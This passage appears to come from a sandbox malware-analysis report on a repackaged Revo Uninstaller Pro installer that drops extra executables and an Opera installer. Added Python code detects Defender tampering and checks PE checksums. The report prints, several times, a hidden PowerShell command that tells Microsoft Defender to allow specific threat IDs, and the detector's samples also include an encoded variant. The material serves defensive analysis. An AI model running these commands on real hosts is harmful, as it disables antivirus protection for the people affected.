        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\ognian\source\repos\revoflt\x64\Release\revoflt.pdb source: rundll32.exe, 00000003.00000003.1633987388.000001994EEA8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: installer.exe.pdb source: setup.exe, 00000021.00000000.2125308793.0000000000D28000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
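The six process-creation records above show the dropped PACK.EXE launching a hidden, non-interactive PowerShell that runs Add-MpPreference with -ThreatIDDefaultAction_Ids and -ThreatIDDefaultAction_Actions Allow. That parameter pair tells Microsoft Defender to allow, rather than remediate, any detection with the given threat ID, so it is a targeted Defender-tampering step; the Sigma hit listed in the overview covers the same cmdlet delivered through a Base64 -EncodedCommand. The detection logic below is an added example, not part of the Joe Sandbox report or of any of the analysed binaries. It takes process-creation command lines (for example Sysmon event 1 or Security event 4688; the log source is an assumption), decodes any -EncodedCommand payload (Base64 of UTF-16LE text) so the cmdlet is visible, and flags every *-MpPreference call that assigns a per-threat-ID default action. The first sample line is the command the sandbox recorded; the encoded second line and the benign third line are constructed for the example. The numeric action codes it maps (Allow = 6, NoAction = 9) are the documented values for Set-MpPreference.

```python
import base64
import re

# Defender cmdlets whose ThreatIDDefaultAction_* parameters assign a per-threat-ID
# default action. "Allow" (6) or "NoAction" (9) means that detection is never remediated.
MP_CMDLET_RE = re.compile(r"\b(Add|Set)-MpPreference\b", re.IGNORECASE)
THREAT_IDS_RE = re.compile(r"-ThreatIDDefaultAction_Ids\s+([0-9][0-9,]*)", re.IGNORECASE)
ACTION_RE = re.compile(r"-ThreatIDDefaultAction_Actions\s+([A-Za-z0-9]+)", re.IGNORECASE)
# Console-hiding switches seen in the recorded command line (prefix forms such as -w / -nop included).
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-noninteractive|-nop(?:rofile)?", re.IGNORECASE)
# Numeric equivalents as documented for Set-MpPreference (Allow = 6, NoAction = 9).
SUPPRESSING_ACTIONS = {"allow": "Allow", "6": "Allow", "noaction": "NoAction", "9": "NoAction"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...) and -ec.
_ENC_NAMES = sorted({"ec"} | {"encodedcommand"[:i] for i in range(1, 15)}, key=len, reverse=True)
ENCODED_RE = re.compile(r"[-/](?:" + "|".join(_ENC_NAMES) + r")\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(b64):
    """Decode a -EncodedCommand payload (Base64 of UTF-16LE text); None if it is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script):
    """Inverse of decode_encoded_command; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_command_line(cmdline):
    """Return (visible text plus every decoded payload, was_encoded) so matching sees the real script."""
    decoded = []
    for match in ENCODED_RE.finditer(cmdline):
        script = decode_encoded_command(match.group(1))
        if script:
            decoded.append(script)
    return "\n".join([cmdline, *decoded]), bool(decoded)


def analyze(cmdline):
    """Return a finding dict if the command line assigns a ThreatIDDefaultAction via *-MpPreference, else None."""
    text, encoded = expand_command_line(cmdline)
    cmdlet = MP_CMDLET_RE.search(text)
    ids = THREAT_IDS_RE.search(text)
    if not (cmdlet and ids):
        return None
    action = ACTION_RE.search(text)
    raw_action = action.group(1) if action else ""
    return {
        "cmdlet": cmdlet.group(0),
        "threat_ids": [int(i) for i in ids.group(1).split(",") if i],
        "action": SUPPRESSING_ACTIONS.get(raw_action.lower(), raw_action),
        "suppresses_remediation": raw_action.lower() in SUPPRESSING_ACTIONS,
        "encoded": encoded,
        "hidden_console": bool(HIDDEN_RE.search(cmdline)),
    }


def scan(lines):
    """Run analyze() over process-creation command lines and keep only the findings."""
    return [finding for finding in (analyze(line) for line in lines) if finding]


# Constructed sample log: line 1 is the command the sandbox recorded above; line 2 is a
# hypothetical encoded variant of the same tampering; line 3 is benign and must not match.
SAMPLE_LOG = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nologo -noninteractive '
    '-windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 '
    '-ThreatIDDefaultAction_Actions Allow -Force"',
    "powershell.exe -nop -w hidden -enc " + encode_command(
        "Set-MpPreference -ThreatIDDefaultAction_Ids 2147735505,2147814523 "
        "-ThreatIDDefaultAction_Actions 6 -Force"),
    "powershell.exe -NoProfile -Command Get-MpComputerStatus",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On a host that has run this sample, the same change is visible in the ThreatIDDefaultAction_Ids and ThreatIDDefaultAction_Actions properties of Get-MpPreference, and Defender's operational log records the preference change; the entries are reverted with Remove-MpPreference -ThreatIDDefaultAction_Ids for each ID. The three IDs are taken verbatim from the sandbox output; the example does not claim which Defender signatures they denote.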
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4275562
        Source: Uninstall.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2d16e
        Source: System.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x39be
        Source: ya.exe.16.dr | Static PE information: real checksum: 0x0 should be: 0x31f21
        Source: INetC.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x4238d
        Source: PACK.EXE.0.dr | Static PE information: real checksum: 0x184409 should be: 0x72a2e
        Source: INetC.dll.27.dr | Static PE information: real checksum: 0x0 should be: 0x4238d
        Source: nsExec.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x939f
        Source: LangDLL.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0xeae7
        Source: System.dll.27.dr | Static PE information: real checksum: 0x0 should be: 0x39be
        Source: OperaSetup[1].exe.27.dr | Static PE information: real checksum: 0x2219eb should be: 0x224e20
        Source: OperaSetup.exe.27.dr | Static PE information: real checksum: 0x2219eb should be: 0x224e20
        Source: tsjtmfdm[1].pkg.0.dr | Static PE information: real checksum: 0x184409 should be: 0x72a2e
        Source: nsDialogs.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x11042
        Source: RevoUnPro.exe.0.dr | Static PE information: section name: .giats
        Source: RevoAppBar.exe.0.dr | Static PE information: section name: .giats
        Source: RevoUninPro.exe.0.dr | Static PE information: section name: .giats
        Source: ruplp.exe.0.dr | Static PE information: section name: .didata
        Source: Opera_installer_2412091640027403532.dll.29.dr | Static PE information: section name: .rodata
        Source: Opera_installer_2412091640027403532.dll.29.dr | Static PE information: section name: CPADinfo
        Source: Opera_installer_2412091640027403532.dll.29.dr | Static PE information: section name: malloc_h
        Source: Opera_installer_2412091640030686032.dll.30.dr | Static PE information: section name: .rodata
        Source: Opera_installer_2412091640030686032.dll.30.dr | Static PE information: section name: CPADinfo
        Source: Opera_installer_2412091640030686032.dll.30.dr | Static PE information: section name: malloc_h
        Source: Opera_installer_2412091640042418092.dll.31.dr | Static PE information: section name: .rodata
        Source: Opera_installer_2412091640042418092.dll.31.dr | Static PE information: section name: CPADinfo
        Source: Opera_installer_2412091640042418092.dll.31.dr | Static PE information: section name: malloc_h
        Source: Opera_installer_2412091640048718040.dll.32.dr | Static PE information: section name: .rodata
        Source: Opera_installer_2412091640048718040.dll.32.dr | Static PE information: section name: CPADinfo
        Source: Opera_installer_2412091640048718040.dll.32.dr | Static PE information: section name: malloc_h
        Source: Opera_installer_2412091640052497196.dll.33.dr | Static PE information: section name: .rodata
        Source: Opera_installer_2412091640052497196.dll.33.dr | Static PE information: section name: CPADinfo
        Source: Opera_installer_2412091640052497196.dll.33.dr | Static PE information: section name: malloc_h
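Two kinds of static PE findings are listed above and are worth reading together. In the checksum lines, "real checksum" is the CheckSum field of the optional header and "should be" is the value the PE checksum algorithm yields for the file as dropped. A field of 0x0 only means the linker never filled it in (Windows enforces the checksum for drivers and some system images, not for ordinary user-mode binaries), so the NSIS plug-in DLLs and ya.exe with 0x0 are unremarkable on that count alone. A non-zero field that does not match, as for PACK.EXE (0x184409 against 0x72a2e, the same pair that tsjtmfdm[1].pkg shows) and the two OperaSetup.exe copies, means the bytes changed after the linker wrote the header: the file was packed, patched, or had data appended. The section-name lines flag names that standard MSVC/GCC/Delphi output does not produce (.giats, CPADinfo, malloc_h; .didata and .rodata are legitimate Delphi and GCC names the report lists for completeness). The code below is an added example, not code from the Joe Sandbox report or from any of the analysed programs: it parses the headers, recomputes the checksum with the algorithm that imagehlp's CheckSumMappedFile uses (the same one pefile reimplements), reports the stored/computed pair in the report's format, and lists sections outside a common-name set. It runs on a constructed minimal PE32 header carrying one section named .giats; that image is synthetic and not loadable, and the common-section set is my own choice.

```python
import struct

DOS_SIGNATURE = b"MZ"
PE_SIGNATURE = b"PE\0\0"
# Section names usually emitted by mainstream linkers; anything else gets reported. (Assumed set.)
COMMON_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc",
                   ".reloc", ".pdata", ".tls", ".CRT", ".debug"}


def _layout(data):
    """Return (optional_header_offset, section_table_offset, number_of_sections)."""
    if len(data) < 0x40 or data[:2] != DOS_SIGNATURE:
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    optional = coff + 20
    return optional, optional + size_of_optional, number_of_sections


def compute_checksum(data):
    """PE checksum as CheckSumMappedFile computes it: every 32-bit word of the file except the
    CheckSum field is summed with carry folding, the sum is folded to 16 bits, then the file
    length is added."""
    optional, _, _ = _layout(data)
    checksum_dword = (optional + 0x40) // 4   # CheckSum sits at OptionalHeader+0x40 in PE32 and PE32+
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == checksum_dword:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data):
    """The CheckSum field as written in the optional header ("real checksum" in the report)."""
    optional, _, _ = _layout(data)
    return struct.unpack_from("<I", data, optional + 0x40)[0]


def verify_checksum(data):
    """Return (stored, computed, matches). stored == 0 means the linker left the field empty."""
    stored, computed = stored_checksum(data), compute_checksum(data)
    return stored, computed, stored == computed


def patch_checksum(data):
    """Return a copy with a correct CheckSum field, which is what a linker's /RELEASE does."""
    optional, _, _ = _layout(data)
    out = bytearray(data)
    struct.pack_into("<I", out, optional + 0x40, compute_checksum(data))
    return bytes(out)


def section_names(data):
    """Names from the section table (8 bytes each, NUL padded, 40-byte entries)."""
    _, table, count = _layout(data)
    names = []
    for i in range(count):
        raw = data[table + i * 40: table + i * 40 + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def unusual_sections(data):
    return [name for name in section_names(data) if name not in COMMON_SECTIONS]


def build_sample_pe():
    """Constructed minimal PE32 header (not one of the files from the report): DOS header,
    PE signature, COFF header, a zeroed 224-byte optional header with CheckSum = 0, and one
    section header named .giats. Enough for the parsers above; not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section, 224-byte optional header
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)                       # PE32 magic; CheckSum at +0x40 stays 0
    section = b".giats".ljust(8, b"\0") + bytes(32)
    return bytes(dos) + PE_SIGNATURE + coff + bytes(optional) + section


if __name__ == "__main__":
    sample = build_sample_pe()
    stored, computed, _ = verify_checksum(sample)
    print("real checksum: %#x should be: %#x" % (stored, computed))
    print("unusual sections:", unusual_sections(sample))
```

Because the CheckSum field itself is skipped by the sum, patching the correct value in does not change what the algorithm computes, which is why patch_checksum followed by verify_checksum yields a match. When triaging, treat a 0x0 field as noise and a wrong non-zero field as a modification indicator; the checksum is not a signature and says nothing about who changed the file.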
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Code function: 13_2_034BFD1C push eax; ret 13_2_034BFD1D
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Code function: 13_2_035FFD0C push eax; iretd 13_2_035FFD0D
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FE336 push ecx; ret 16_2_002FE349
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FD870 push eax; ret 16_2_002FD88E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_045142CD push ebx; ret 17_2_045142DA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_04516820 push eax; ret 17_2_04516833
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_06E25C86 pushad ; iretd 17_2_06E25C87
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_06E25C74 pushad ; iretd 17_2_06E25C7E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04AB6820 push eax; ret 23_2_04AB6833
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04AB29C0 push 0000006Dh; ret 23_2_04AB29D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04AB3AB8 push ebx; retf 23_2_04AB3ADA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_071E4599 push eax; iretd 23_2_071E459A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_071E458E push eax; iretd 23_2_071E458F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_071E4425 push ebp; iretd 23_2_071E4426
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_071E5C74 pushad ; iretd 23_2_071E5C7E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_071E5C86 pushad ; iretd 23_2_071E5C87
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_085E73C0 pushfd ; retf 23_2_085E73C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_048A5E9D push esp; ret 25_2_048A5EC3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_048A6820 push eax; ret 25_2_048A6833
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_048A3AB8 push ebx; retf 25_2_048A3ADA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07252504 pushad ; iretd 25_2_0725250E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07252516 pushad ; iretd 25_2_07252517
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07255C74 pushad ; iretd 25_2_07255C7E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07255C86 pushad ; iretd 25_2_07255C87

        Persistence and Installation Behavior

        Source: c:\program files\vs revo group\revo uninstaller pro\ruext.dll - COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{2c5515dc-2a7e-4bfd-b813-cacc2b685eb7}\inprocserver32
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe - File created: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\INetC.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsDialogs.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkg
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\LangDLL.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Opera_115.0.5322.77_Autoupdate_x64[1].exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe - File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\OperaSetup[1].exe
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe - File created: C:\Users\user\Downloads\OperaSetup.exe
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640052497196.dll
        Source: C:\Users\user\Downloads\OperaSetup.exe - File created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE - File created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\System.dll
        Source: C:\Windows\System32\rundll32.exe - File created: C:\Windows\System32\drivers\SETE8C2.tmp
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640027403532.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640030686032.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640048718040.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Temp\PACK.EXE
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)
        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe - File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640042418092.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091140041\opera_package
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsExec.dll
        Source: C:\Windows\System32\rundll32.exe - File created: C:\Windows\system32\DRIVERS\revoflt.sys (copy)
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe - File created: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\System.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114003209.log
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe - File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114005402.log
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt

        Boot Survival

        Source: C:\Windows\System32\rundll32.exe - Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe - Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\VS Revo Group\Revo Uninstaller Pro\Uninstaller\AllProgs\RegExclude HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
        Source: C:\Windows\System32\rundll32.exe - Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Revoflt\Instances

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
